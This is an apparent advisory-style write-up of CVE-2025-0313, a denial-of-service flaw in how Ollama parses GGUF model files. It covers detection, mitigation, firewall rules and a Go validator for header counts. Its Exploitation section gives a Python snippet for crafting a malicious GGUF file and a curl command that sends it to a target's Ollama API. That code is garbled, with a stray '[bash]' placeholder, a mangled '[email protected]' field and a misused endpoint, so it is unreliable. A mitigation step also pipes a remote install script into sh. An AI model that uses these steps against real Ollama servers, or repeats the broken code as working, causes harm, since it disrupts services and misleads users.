How the CVE Works:
CVE-2025-0313 stems from improper bounds checking in Ollama (<=v0.3.14) when it parses maliciously crafted GGUF model files. Attackers manipulate array indices within the GGUF header, triggering an out-of-bounds read or write. This corrupts memory, crashes the service, and disrupts model inference. Remote exploitation occurs when Ollama loads the malicious model via API or CLI, consuming excessive CPU/memory.
DailyCVE Form:
Platform: Ollama
Version: <=0.3.14
Vulnerability: DoS via GGUF
Severity: Critical
Date: 04/03/2025
What Undercode Says:
Exploitation:
1. Craft a GGUF file with invalid tensor dimensions:
import gguf
mal_gguf = gguf.GGUFWriter("exploit.gguf")
mal_gguf.add_tensor("weights", [bash], b"\x00")  # Oversized array
mal_gguf.write()
2. Upload via Ollama API:
curl -X POST http://target:11434/api/push -F "[email protected]"
Detection:
- Log anomalous model loads:
grep "panic: index out of range" /var/log/ollama.log
Mitigation:
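1. Patch to v0.3.15+ (on Linux, re-run the official install script, then confirm the version):
curl -fsSL https://ollama.com/install.sh | sh
ollama --version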
2. Restrict model uploads:
location /api/push { allow 192.168.1.0/24; deny all; }
Debugging:
- Trace crashes with GDB:
OLLAMA_DEBUG=1 gdb -ex run --args ollama serve
Forensics:
- Extract malicious GGUF metadata:
strings exploit.gguf | grep -A 5 "tensors"
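- Sanity-check the header counts of a suspect file before any loader touches it. The Go sketch below is an added example, not Ollama's parser or its fix: it reads the GGUF v2/v3 header (magic, version, tensor_count, metadata_kv_count) and rejects counts that cannot fit in the file. The function names, the minimum-size constants and the sample headers are assumptions constructed for illustration.

```go
package main

import (
	"encoding/binary"
	"fmt"
)

// Smallest possible encodings in GGUF v2/v3 (all integers little-endian).
const (
	headerLen    = 24 // magic(4) + version(4) + tensor_count(8) + metadata_kv_count(8)
	minKVLen     = 13 // key length(8) + value type(4) + one-byte value
	minTensorLen = 24 // name length(8) + n_dims(4) + type(4) + data offset(8)
)

// CheckGGUFHeader rejects a file whose declared counts cannot fit in fileSize.
func CheckGGUFHeader(buf []byte, fileSize uint64) error {
	if len(buf) < headerLen || fileSize < headerLen {
		return fmt.Errorf("truncated header")
	}
	if string(buf[:4]) != "GGUF" {
		return fmt.Errorf("bad magic %q", buf[:4])
	}
	if v := binary.LittleEndian.Uint32(buf[4:8]); v != 2 && v != 3 {
		return fmt.Errorf("unsupported version %d", v)
	}
	tensors := binary.LittleEndian.Uint64(buf[8:16])
	kvs := binary.LittleEndian.Uint64(buf[16:24])
	budget := fileSize - headerLen
	// Divide rather than multiply so a huge count cannot overflow uint64.
	if kvs > budget/minKVLen {
		return fmt.Errorf("metadata_kv_count %d cannot fit in %d bytes", kvs, fileSize)
	}
	budget -= kvs * minKVLen
	if tensors > budget/minTensorLen {
		return fmt.Errorf("tensor_count %d cannot fit in %d bytes", tensors, fileSize)
	}
	return nil
}

// sampleHeader builds a constructed 24-byte v3 header for the demo below.
func sampleHeader(tensors, kvs uint64) []byte {
	b := binary.LittleEndian.AppendUint32([]byte("GGUF"), 3)
	b = binary.LittleEndian.AppendUint64(b, tensors)
	return binary.LittleEndian.AppendUint64(b, kvs)
}

func main() {
	fmt.Println(CheckGGUFHeader(sampleHeader(2, 3), 4096))     // plausible counts
	fmt.Println(CheckGGUFHeader(sampleHeader(1<<40, 3), 4096)) // count larger than the file
}
```

This is a coarse gate on the two header counts only; per-tensor dimensions and offsets still need bounds checks in the loader itself.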
Network Controls:
- Block untrusted sources:
iptables -A INPUT -p tcp --dport 11434 ! -s trusted_ip -j DROP
References:
Reported By: https://nvd.nist.gov/vuln/detail/CVE-2025-0313